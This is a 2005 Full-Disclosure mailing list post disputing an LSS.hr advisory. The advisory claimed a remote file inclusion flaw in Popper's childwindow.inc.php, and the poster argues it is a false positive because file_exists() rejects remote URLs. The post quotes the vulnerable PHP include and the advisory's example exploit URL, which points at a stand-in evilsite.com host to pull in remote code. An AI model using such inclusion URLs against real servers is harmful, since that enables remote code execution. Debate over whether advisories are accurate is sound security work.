[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] LSS.hr false positives.

To: security@xxxxxx
Subject: [Full-disclosure] LSS.hr false positives.
From: "b0iler" <b0iler@xxxxxxxxxxxx>
Date: Sat, 4 Jun 2005 22:15:26 +0100 (BST)

>From your advisory @ 
>http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-06-07:


>Popper is vulnerable to remote code inclusion bug in childwindow.inc.php 
>script that can be
>abused to execute arbitrary code.
>Vulnerable code in childwindow.inc.php:
>
>-----
>...
>    if(file_exists($form.".toolbar.inc.php")) {
>        include($form.".toolbar.inc.php");
>    }
>?>

file_exists() only work on local files, not even with allow_url_fopen on does 
it work.  Even
if the file_exists() check was not there your discription of how to exploit it 
is incorrect:

>To exploit this vulnerability, attacker has to put script like 
>test.form.inc.php on
>www.evilsite.com HTTP server, and call url like this:
>http://www.vulnsite.com/popper/childwindow.inc.php?form=http://evilsite.com/test

they would need to have the file test.toolbar.inc.php, not test.form.inc.php.  
It's quite
obvious you did not even bother testing this before issuing the advisory.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Request for comments: anti-phishing storefrontapproach
Next by Date: [Full-disclosure] Off topic rant to my friends
Previous by thread: [Full-disclosure] [FLSA-2005:152532] Updated kernel packages fix security issues
Next by thread: [Full-disclosure] Off topic rant to my friends
Index(es):
- Date
- Thread